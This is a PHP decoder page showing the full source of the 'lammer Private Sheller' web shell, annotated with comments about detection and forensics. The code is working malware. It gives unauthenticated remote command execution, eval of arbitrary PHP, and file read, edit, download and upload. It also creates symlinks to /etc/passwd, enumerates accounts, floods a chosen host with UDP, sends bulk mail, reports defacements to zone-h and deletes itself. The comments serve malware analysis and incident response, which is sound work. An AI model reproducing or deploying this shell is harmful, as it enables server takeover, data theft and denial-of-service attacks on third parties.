PHP Decode
<?php $ini_reconf = array( 'display_errors' => '0', 'disable_functions' => '', 'fi..
Decoded Output download
NoneNoneNoneNone
--=[ lammer Private Sheller ]=--<br>
+---++---==[ Version : 1.0 ]==---++---+<br>
Original Code
<?php
// Runtime reconfiguration attempted before anything else runs. Every entry is
// pushed through ini_set() in the loop below. The list targets the directives
// that normally contain a compromised script (function blocklist, path jail,
// upload and resource limits) and switches off error display.
// A script that tries to blank disable_functions and open_basedir is a
// high-confidence static indicator for web-shell scanning.
$ini_reconf = array(
'display_errors' => '0',
// NOTE(review): on stock PHP, disable_functions can only be set in php.ini, so
// this entry is expected to have no effect; the attempt itself is the signal.
'disable_functions' => '',
'file_uploads' => 'On',
// '0' removes the execution time limit for the request.
'max_execution_time' => '0',
'memory_limit' => '1024M',
// NOTE(review): since PHP 5.3 open_basedir can only be narrowed at run time,
// so clearing it should not lift a restriction set in php.ini or the pool
// config. Confirm against the affected host's PHP version.
'open_basedir' => '',
// safe_mode was removed in PHP 5.4; these two keys point at an old code lineage.
'safe_mode' => 'Off',
'sql.safe_mode' => 'Off',
'upload_max_filesize' => '1024M',
);
foreach ($ini_reconf as $key => $value) {
// '@' suppresses the warning raised for directives that cannot be changed at
// run time, so rejected settings leave no trace in the response.
@ini_set($key, $value);
}
function lammer() { ?>
<html>
<head>
<title>lammer Private SHELL</title>
</head>
<body bgcolor=black>
<center>
<style>
input{
background-color: red; font-size: 8pt; color: #00; font-family: Tahoma; border: 0 solid #66;
}
button{
background-color: red; font-size: 8pt; color: #00; font-family: Tahoma; border: 0 solid #66;
}
</style>
<style type="text/css"> body{
} .phpinfo table{
} .phpinfo td{
background:#111111;
color:#cccccc;
} .phpinfo th, th{
background:#191919;
border-bottom:1px solid #333333;
font-weight:normal;
} .phpinfo h2, .phpinfo h2 a{
text-align:center;
padding:0;
background:#222222;
padding:4px 0;
} .explore{
} .explore a {
text-decoration:none;
} .explore td{
border-bottom:1px solid #333333;
} .explore th{
font-weight:normal;
} .explore th:hover , .phpinfo th:hover{
border-bottom:1px solid #4C83AF;
} .explore tr:hover{
background:#111111;
} .viewfile{
background:#EDECEB;
color:#000000;
} .sembunyi{
display:none;
} </style>
<font color=green>
|
<a href="<?php echo $_SERVER['PHP_SELF']; ?>">Home</a> |
<a href="?pwd=<?php echo $_GET['pwd'] ?>&filemanager">File Manager</a> |
<a href="?pwd=<?php echo $_GET['pwd'] ?>&cmd">Shell Command</a> |
<a href="?pwd=<?php echo $_GET['pwd'] ?>&upload">Upload File</a> |
<a href="?eval">eval</a> |
<a href="?sym">Symlink</a> |
<a href="?dos">D O S</a> |
<a href="?phpinfo">phpInfo</a> |
<a href="?zone">Zone</a> |
<a href="?mail">Mail</a> |
<a href="?tool">Tools</a> |
<a href="?kill">Kill Me</a> |
<br><hr width=750><br>
<?php }
// Error output is disabled a second time, and error_reporting(0) silences
// reporting altogether, so failures in the handlers below are not shown.
ini_set("display_errors", false); error_reporting(0);
// The page header/menu is rendered for every request except a ?dfile= download.
// No password or other credential check appears before this point in the
// visible code: anyone who can reach the URL gets the full interface.
if(isset($_GET['dfile'])){}else{lammer();}
?>
<?php
// Prints the shell's banner; called when no other handler parameter is present.
// The two literal banner lines are stable strings that can be used for content
// matching in file-integrity checks or signature-based scans of a web root.
function about(){
echo '
--=[ lammer Private Sheller ]=--<br>
+---++---==[ Version : 1.0 ]==---++---+<br>
';
}
// Formats a file's size for the file-manager listing.
// Returns the raw byte count when it is <= 1024, otherwise a string such as
// "12.5 kb" or "3.2 mb" (rounded to two decimals). Returns "???" when
// filesize() yields a falsy value, which covers both a failed stat and an
// empty (0-byte) file.
function siz($file){
// '@' hides the warning filesize() raises for unreadable or missing paths.
if($size = @filesize($file)){
if($size <= 1024) return $size;
else{
if($size <= 1024*1024) {
$size = @round($size / 1024,2);;
return "$size kb";
} else {
$size = @round($size / 1024 / 1024,2);
return "$size mb";
} } } else return "???";
}
// Command-execution helper used by the delete, symlink and "fast command"
// handlers. Runs $com through the first of shell_exec, system, passthru, exec
// that function_exists() reports, and echoes the result. The callers build
// $com from request data and it reaches the shell unmodified.
// The function names are passed as bare words rather than strings, so the
// probes depend on PHP's legacy undefined-constant fallback; that dates the
// sample to PHP 5/7-era hosts.
// Host-level signal for this path: the web server's PHP worker spawning a
// shell or another child process.
function ex($com) {
if (function_exists(shell_exec)) {
echo shell_exec($com);
} elseif (function_exists(system)) {
echo system($com);
} elseif (function_exists(passthru)) {
echo passthru($com);
} elseif (function_exists(exec)) {
echo exec($com);
}
}
// Renders the contents of $file into the page for the ?view= handler.
// The path arrives straight from the query string, so this is an arbitrary
// file read bounded only by what the PHP process is allowed to open.
// Output is HTML-escaped and line breaks are converted to <br>.
function view($file) {
echo "</center><div class=\"viewfile\">";
// A failed read is suppressed by '@' and shows up as an empty viewer.
echo nl2br(htmlentities((@file_get_contents($file))));
echo "</div>";
}
// Emits the <textarea name="txt"> used by the ?edit= handler, pre-filled with
// the current contents of $file. The path comes from the query string.
// Unlike view(), the contents are echoed without HTML escaping.
function edit($file) {
echo '<textarea name="txt" cols="90" rows="18" style="color:#0F0; background-color: #000000; border: 4px inset #3399FF;">';
echo (@file_get_contents($file));
echo "</textarea>";
}
// Builds a nine-character rwx string (owner, group, other) from the mode bits
// returned by fileperms(), for the file-manager listing.
// Returns "??????????" when fileperms() yields a falsy value.
// File-type and setuid/setgid/sticky bits are not represented.
function get_perms($file) {
if($mode=@fileperms($file)){
$perms='';
// owner
$perms .= ($mode & 00400) ? 'r' : '-';
$perms .= ($mode & 00200) ? 'w' : '-';
$perms .= ($mode & 00100) ? 'x' : '-';
// group
$perms .= ($mode & 00040) ? 'r' : '-';
$perms .= ($mode & 00020) ? 'w' : '-';
$perms .= ($mode & 00010) ? 'x' : '-';
// other
$perms .= ($mode & 00004) ? 'r' : '-';
$perms .= ($mode & 00002) ? 'w' : '-';
$perms .= ($mode & 00001) ? 'x' : '-';
return $perms;
} else return "??????????";
}
//downloader
// Arbitrary file download: the path in ?dfile= is read and streamed back as an
// attachment with no validation or allow-list. The same request value is
// copied into the Content-Disposition header as-is.
// There is no exit after readfile(), so the handlers below still run.
if(isset($_GET['dfile'])){
header('Content-Length:'.filesize($_GET['dfile']).'');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.$_GET['dfile'].'"');
readfile($_GET['dfile']);
//end downloader
}
// ?pwd= carries the operator's working directory from one request to the next.
$pwd=$_GET['pwd'];
// File-manager write actions. All of them are driven by GET parameters, so the
// paths acted on are recorded in ordinary web access logs; the keys dfile,
// delete, fdelete, mkdir and pwd in a query string are useful search terms
// during incident response.
//   delete  - unlink() the path, then also pass it to `rm -f` through ex()
//   fdelete - rmdir() the path after trimming a trailing separator
//   mkdir   - create the directory $pwd . <name>
if(isset($_GET['delete']) && ($_GET['delete'] != "")){
$file = $_GET['delete'];
@unlink($file);
// The request value is interpolated into a shell command line without quoting.
ex("rm -f $file");
echo "<script>location='".$_SERVER['PHP_SELF']."?filemanager&pwd=$pwd'</script>";
} elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
@rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
echo "<script>location='".$_SERVER['PHP_SELF']."?filemanager&pwd=$pwd'</script>";
} elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
$path = $pwd.$_GET['mkdir'];
@mkdir($path);
} ?>
<?php
if(isset($_GET['sym'])){ ?>
<form method=POST >
<p>
TARGET : <br><input type="text" name="in" value="/etc/passwd"/><br>
LINK_NAME : <br><input type="text" name="des" value="lammer.txt"/><br>
<input type="submit" value="Run" />
</p>
</form>
<?php
// Symlink handler (?sym): links the POSTed target path ("in") to the POSTed
// link name ("des"), which is created relative to the script's directory and
// is then offered back as a clickable URL. The form above defaults the target
// to /etc/passwd.
// Defensive notes: this only yields a readable file if the web server follows
// symlinks out of the document root. Apache's SymLinksIfOwnerMatch (instead of
// FollowSymLinks) or nginx's disable_symlinks closes that path. Symlinks under
// a web root whose target lies outside it are worth sweeping for.
$in=$_POST['in'];
$des=$_POST['des'];
// Runs when either field is present, not only when both are.
if(isset($_POST['in']) || isset($_POST['des'])){
if (function_exists(symlink)) {
symlink($in,$des);
// Success is reported without checking symlink()'s return value.
echo "<br>Symlink Created <a href='$des'>$des</a>";
} else {
// Fallback through the shell helper: `ln -s` is issued twice, then a perl
// one-liner; both request values are concatenated into the command unquoted.
$com="ln -s ".$in." ".$des;
ex($com);
$com="ln -s ".$in." ".$des;
ex($com);
$com="perl -e 'symlink(\"".$in."\",\"".$des."\")'";
ex($com);
echo "<br>Symlink Created <a href='$des'>$des</a>";
}
}
?>
<?php }elseif(isset($_GET['dos'])){ ?>
<div style="color:#fff;" class="myleft" >
<?php
// UDP flood handler (?dos). When the POST carries "host" and "time", the
// compromised server itself becomes the traffic source for that many seconds.
// Defensive notes:
//  - block or rate-limit outbound UDP from web-tier hosts at the egress firewall
//  - the datagram payload is a run of 'X' bytes, which is matchable on the wire
//  - POST bodies carry the static hidden field act=lammerlammerlammer
//  - expect a long-lived, CPU-bound PHP worker whose HTTP client may already
//    have disconnected
// $ipp is assigned but not used in the visible code.
$ipp=$_SERVER['REMOTE_ADDR'];
if(isset($_POST['host'])&&isset($_POST['time'])){
$packets = 0;
// Keep running after the client disconnects and lift PHP's time limit.
ignore_user_abort(TRUE);
set_time_limit(0);
$exec_time = $_POST['time'];
$time = time();
$max_time = $time+$exec_time;
$host = $_POST['host'];
// Build the 65000-byte payload.
for($i=0;$i<65000;$i++){
$out .= 'X';
}
// Send loop: one socket open/write/close per iteration until the deadline.
while(1){
$packets++;
if(time() > $max_time){
break;
}
// The literal port value "rand" selects a new random port for each datagram.
if ($_POST['port' ]=="rand"){
$rand = rand(1,65000);
}else{
$rand=$_POST['port'];
}
$fp = fsockopen("udp://$host", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "";
// Summary line shown to the operator; $host is echoed back unescaped.
echo "<center><br>Completed with <b> $packets (" . round(($packets*65)/1024, 2) . " MB)</b> packets averaging <b>". round($packets/$exec_time, 2) . "</b> packets per second \n to <b>" . $host . "</b><hr width=600>" ;
echo "<font color=red>";
echo "<blink><font color=red size=2><b> </b></blink><br>";
echo '<form action="#" method=POST>
<input type="hidden" name="act" value="lammerlammerlammer">
<b> Ip: </b> <br><input type=text name=host value=><br>
<b> Time </b> (seconds): <br><input type=text name=time value=><br>
<b> Port </b>(Random Port=rand) <br><input type=text name=port value=rand size=30><br><br>
<input type=submit value=" Start Attack "><br></form>';
}else{ echo "<center><br><blink><font color=red size=2><b> </b></blink>";
echo '<form action="" method=POST>
<input type="hidden" name="act" value="lammerlammerlammer">
<b> Ip: </b> <br><input type=text name=host value=><br>
<b> Time </b> (seconds): <br><input type=text name=time value=><br>
<b> Port </b>(Random Port=rand)<BR><input type=text name=port value=rand size=30><br><br>
<input type=submit value=" Start Attack "><br></form>';
}
//DOS CODE ENDED
?>
<?php }elseif(isset($_GET['cmd'])){ ?>
<?php
// Interactive command handler (?cmd). The POSTed "command" is prefixed with
// `cd "<pwd>"&&`, where pwd comes from the query string, and the whole string
// is handed to the shell. "execute_type" picks the PHP function: 1 shell_exec,
// 2 system, 3 passthru, 4 first one that function_exists() reports.
// Nothing is validated or escaped. Only ?cmd and pwd reach the access log;
// the command travels in the POST body, so request-body logging or host
// process auditing is needed to recover what was run.
if ($_POST['command'] != ''){echo '<textarea readonly cols="90" rows="18" style="color:#0F0; background-color: #000000; border: 4px inset #3399FF;">'; $exec_type=$_POST['execute_type'];if(!isset($_GET['pwd'])){$_GET['pwd']="";} $com="cd \"".$_GET['pwd']."\"&&".$_POST['command'];if (isset($exec_type)) { if ($exec_type=="1") { echo shell_exec($com); } elseif($exec_type=="2") { echo system($com); } elseif ($exec_type=="3") { passthru($com); } elseif ($exec_type=="4") { if (function_exists(shell_exec)) { echo shell_exec($com); } elseif (function_exists(system)) { echo system($com); } elseif (function_exists(passthru)) { echo passthru($com); } else { echo "[-]I can not Execute any command"; } } } } echo '</textarea>'; echo' <form method=POST > <p> command <br><input type="text" name="command" /> <br>Method <br><select name="execute_type"> <option value=4>Auto Select</option> <option value=1>shell exec</option> <option value=2>system</option> <option value=3>passthru</option> </select> <br><input type="submit" value="Execute" /> </p> </form>';
?>
<?php }elseif(isset($_GET['zone'])){ ?>
<?php
ob_start();
$sub = get_loaded_extensions();
if(!in_array("curl", $sub)){ die('Curl NotFound'); }
if($_POST) {
$hacker = $_POST['defacer'];
$site = $_POST['domain'];
if ($hacker == "") { die ("<center>Please Enter hacker name !</font><center>"); }
elseif($site == "") { die("<center>Please Enter sites url !</font></center>"); }
$i = 0;
$sites = explode("\n", $site);
while($i < count($sites)) {
if(substr($sites[$i], 0, 4) != "http") { $sites[$i] = "http://".$sites[$i]; }
poster("http://zone-h.org/notify/single", $hacker, $sites[$i]);
++$i;
}
echo "<center><font color=red>ok</font></center>";
}else{
echo '<center>
<form action="" method="post">
<div id="option">
<p>Defacer<br />
<span class="ok"><input type="text" name="defacer" size="40" /></span> </p>
<p>Site list</font> <br />
<span class=""><textarea name="domain" cols="43" rows="17"></textarea></span> </p>
<p><input type="submit" value="send " />
</form>
<br>
</div>
</center>';
}
// Sends one form POST to $url with the fields defacer, domain1, hackmode and
// reason, follows redirects, and returns the response body. The ?zone handler
// calls it once per submitted site with the zone-h.org notification URL and
// ignores the return value.
// $hacker and $site are concatenated into the body without URL-encoding.
// Defensive note: outbound HTTP from a web server to that notification host
// is a network-level indicator that this handler ran.
function poster($url, $hacker, $site )
{
$k = curl_init();
curl_setopt($k, CURLOPT_URL, $url);
curl_setopt($k,CURLOPT_POST,true);
curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=2&reason=1");
curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
$kubra = curl_exec($k);
curl_close($k);
return $kubra;
}
?>
<?php }elseif(isset($_GET['mail'])){ ?>
<? if(isset($_POST['email'])){
?><div style="color:#fff;" class="myleft" ><?php
$to = $_POST['to'];
$subject = $_POST['subject'];
$text = $_POST['text'];
$number = $_POST['number'];
for($i=1; $i++; $i < $number){
mail($to, $subject, $text);
}}
?>
<br><br>
<center>
<table align="center" dir="ltr" width="200px" border="0" cellspacing="1" cellpadding="1">
<tr>
<td colspan="2" style="color:#fff;" align="center">Send Mail</td>
</tr>
<tr><form action="" method="post" name="form11" >
<td>To: </td>
<td><input name="to" value="[email protected]" type="text"></td>
</tr>
<tr>
<td style="color:#fff;" >Subject: </td>
<td><input name="subject" value="[NO SUBJECT]" type="text"></td>
</tr>
<tr>
<td style="color:#fff;" >Text: </td>
<td> <textarea rows="10" cols="60" name="text" >test</textarea></td>
</tr>
<tr>
<td style="color:#fff;" >Num: </td>
<td><input name="number" value="80" type="text"></td>
</tr>
<tr>
<td colspan="2" align="center"><input name="sub" value="send" type="submit"></td>
</tr></form>
</`>
</center>
</div>
<?php }elseif(isset($_GET['upload'])){ ?>
<?php
// Upload handler (?upload). The uploaded file is moved into the directory named
// by ?pwd= (or the script's working directory when pwd is empty) under the
// client-supplied filename, with no extension, type or path check.
// The success message is built without checking move_uploaded_file()'s return.
// Defensive notes: the web server account should not be able to write to any
// directory from which PHP is executed, and script execution should be denied
// in upload locations. New .php files owned by the web server user are the
// artefact to look for.
if ($_GET['pwd' ]==''){ $dir = getcwd();}else{$dir=$_GET['pwd'];} if (!empty ($_FILES['UP'])) { move_uploaded_file($_FILES['UP']['tmp_name'],$dir.'/'.$_FILES['UP']['name']); $lammer_text = "<b>Uploaded Successfully</b><br>file name : $dir/".$_FILES['UP']['name']."<br>file size : ".$_FILES['UP']['size']."<br>file type : ".$_FILES['UP']['type']."<br>"; } echo " <left> <form method='POST' enctype='multipart/form-data'> <input type='file' name='UP' size='23' > <input type='submit' value='Upload' size='35' > </form> </left>"; echo $lammer_text; ?>
<?php }elseif(isset($_GET['eval'])){ ?>
<?php
// PHP eval handler (?eval): the POSTed "ev" field is executed as PHP source in
// the context of this script. This path needs no shell access, so blocking the
// process-spawning functions does not close it; the code runs with whatever
// the PHP process can do. The payload is only in the POST body, not the URL.
if(isset($_POST['ev'])){eval($_POST['ev']);} ?>
<form method="POST"><p align="center"><textarea rows="19" name="ev" cols="87"></textarea><br><input type=submit value="Execute"></form></p>
<?php }elseif(isset($_GET['phpinfo'])){ ?>
<?php
@ob_start();
@eval("phpinfo();");
$buff = @ob_get_contents();
@ob_end_clean();
$st = strpos($buff,"<body>")+6;
$en = strpos($buff,"</body>");
echo "<div class=\"phpinfo\">".substr($buff,$st,$en-$st)."</div>";
?>
<?php }elseif(isset($_GET['passwd'])){ ?>
<textarea readonly cols="90" rows="18" style="color:#0F0; background-color: #000000; border: 4px inset #3399FF;">
<?php
// Local account enumeration (?passwd): asks the POSIX extension for the passwd
// entry of every uid from 0 to 59999 and prints each entry's fields joined by
// ':'. No file is opened by this script to do so.
// NOTE(review): presumably chosen so the listing still works when reading
// /etc/passwd directly is blocked. Confirm against the host's restrictions.
// each() was removed in PHP 8, another sign that the sample targets older PHP.
for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "\n";
}
}
?>
</textarea>
<?php }elseif(isset($_GET['tool'])){ ?>
TOOLS<br>
| <a href="?passwd">Read /etc/passwd</a> |<br>
| <a href="?perl">Perl Eval</a> |<br>
| <a href="?code">Encode to md5,base64,Des</a> |<br>
| <a href="?fastcmd">Fast Command</a> |<br>
<?php }elseif(isset($_GET['kill'])){ ?>
<?php
// Self-removal handler (?kill): deletes this script from disk, first with
// unlink() and then again with `rm -f` through whichever process function is
// available, then redirects the browser.
// Forensic note: after this runs the file is gone from the web root, so
// responders have to rely on access logs (a request carrying ?kill), backups
// or snapshots, and file-system metadata rather than on finding the script.
@unlink($_SERVER["DOCUMENT_ROOT"].$_SERVER["SCRIPT_NAME"]);
$com="rm -f ".$_SERVER["DOCUMENT_ROOT"].$_SERVER["SCRIPT_NAME"];
if (function_exists(shell_exec)) {
echo shell_exec($com);
} elseif (function_exists(system)) {
echo system($com);
} elseif (function_exists(passthru)) {
echo passthru($com);
} elseif (function_exists(exec)) {
echo exec($com);
}
echo "<script>alert('I Was Killed :(')</script>";
echo "<script>location='".$_SERVER['PHP_SELF']."?'</script>";
?>
<?php }elseif(isset($_GET['filemanager'])){ ?>
<font color=red>
<?php
if(isset($_GET['pwd'])){$pwd=$_GET['pwd'];}else{$pwd=getcwd();}
$pwd=realpath($pwd);
chdir($pwd);
echo "<form method=GET action='http://127.0.0.1/my/lammer/shell.php'>
<input name='filemanager' type=text hidden><input value='$pwd' name='pwd' type=text size=40> <input type=submit value='go'>
</form>";
echo '<table style="width:50%;" border=".1"> ';
$fname = array();
$dname = array();
if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
else $posix = FALSE;
if($dh = opendir($pwd)){
while($file = readdir($dh)){
if(is_dir($file)){
$dname[] = $file;
} elseif(is_file($file)){
$fname[] = $file;
} } closedir($dh);
} sort($fname);
sort($dname);
$path = @explode(DIRECTORY_SEPARATOR,$pwd);
$tree = @sizeof($path);
foreach($dname as $dd){
$name=posix_getpwuid(fileowner($dd));
$group=@posix_getgrgid(@filegroup($dd));
$owner=$name['name'].":".$group['name'];
if($dd=="." || $dd==".."){$type="LINK";$op="";}else{$type="DIR";$op="<a href='?filemanager&pwd=$pwd&Fdelete=$pwd/$dd'>R</a>";}
$ok=realpath("$pwd/$dd");
echo "<td><font color=red><a href='?filemanager&pwd=$ok'>[ $dd ]</a></td><td><font color=red>$type</td><td><font color=red>$owner</td><td><font color=red>".get_perms($dd)."</td><td><font color=red>".siz($dd)."</td><td><font color=red>$op</td><tr></tr>";
}
foreach($fname as $ff){
$name=@posix_getpwuid(@fileowner($ff));
$group=@posix_getgrgid(@filegroup($ff));
$owner=$name['name'].":".$group['name'];
$ok=realpath("$pwd");
echo "<td><font color=red><a href='?view=$ok/$ff&pwd=$ok'>$ff</td><td><font color=red>File</td><td><font color=red>$owner</td><td><font color=red>".get_perms($ff)."</td><td><font color=red>".siz($ff)."</td><td><font color=red><a href='?pwd=$pwd&dfile=$pwd/$ff'>D</a>-<a href='?filemanager&pwd=$pwd&delete=$pwd/$ff'>R</a>-<a href='?edit=$pwd/$ff&pwd=$pwd'>E</a></td><tr></tr>";
}
echo "</table>";
?>
<?php }elseif(isset($_GET['view'])){ ?>
<?php view($_GET['view']); ?>
<?php }elseif(isset($_GET['edit'])){ ?>
<?php if(isset($_POST['save'])){
$file = $_GET['edit'];
$content = $_POST['txt'];
if($filez = @fopen($file,"w")){
$time = date("d-M-Y H:i",time());
if(@fwrite($filez,$content)) {$msg = "file saved at ".$time; echo "<script>alert('$msg')</script>";}
else{ $msg = "failed to save"; echo "<script>alert('$msg')</script>";}
@fclose($filez);
}
}
?>
<form method=POST>
<?php edit($_GET['edit']); ?>
<br><input type=submit name="save" value='Save'></form>
<?php }elseif(isset($_GET['perl'])){ ?>
<?php if(isset($_POST['ev'])){
$perl=new perl();
ob_start();
$perl->eval($_POST['ev']);
$exec=ob_get_contents();
ob_end_clean();
echo $exec;
}
?>
<form method="POST"><p align="center"><textarea rows="19" name="ev" cols="87"></textarea><br><input type=submit value="Execute"></form></p>
<?php }elseif(isset($_GET['fastcmd'])){ ?>
<?php if(isset($_POST['runcmd'])){echo '<textarea readonly cols="90" rows="18" style="color:#0F0; background-color: #000000; border: 4px inset #3399FF;">';ex($_POST['runcmd']);echo "</textarea>";}?>
<form method=POST>
<br><b>Fast Command<Br></b><select size="1" name="runcmd">
<option value='ps aux'>ps aux</option>
<option value='cat /etc/passwd'>cat /etc/passwd</option>
<option value='find / -name "*config*php"'>find / -name "*config*php"</option>
<option value='cat /etc/httpd/conf/httpd.conf'>cat /etc/httpd/conf/httpd.conf</option>
<option value='ls -la /var/lib/mysql/'>ls -la /var/lib/mysql/</option>
<option value='netstat -a'>netstat -a</option>
<option value='perl -v'>perl -v</option>
<option value='gcc -v'>gcc -v</option>
<option value='tar -v'>tar --help</option>
<option selected>...Select command...</option>
</select><br>
<input type=submit value='...Exec...'></form>
<?php }elseif(isset($_GET['code'])){ ?>
<?php if ($_POST['hash'] != ''){
echo "MD5:<input size=100 value='".md5($_POST['hash'])."'><br>";
echo "SHA1:<input size=100 value='".sha1($_POST['hash'])."'><br>";
echo "DES:<input size=100 value='".crypt($_POST['hash'])."'><br>";
echo "base64_encode:<input size=100 value='".base64_encode($_POST['hash'])."'><br>";
echo "base64_decode:<input size=100 value='".base64_decode($_POST['hash'])."'><br>";
} echo' <form method=POST > <p> text <br><input type="text" name="hash" /> <br><input type="submit" value="Convert" /> </p> </form>';
?>
<?php }else{ if(isset($_GET['dfile'])){}else{about();}?>
<?php } if(isset($_GET['dfile'])){}else{elammer();} function elammer() {?>
<hr width=750><center>
<?php } ?>
Function Calls
| about | 1 |
| lammer | 1 |
| elammer | 1 |
| ini_set | 2 |
| error_reporting | 1 |
Stats
| MD5 | a07049873902ec6e28060d6d7a8b48f7 |
| Eval Count | 0 |
| Decode Time | 236 ms |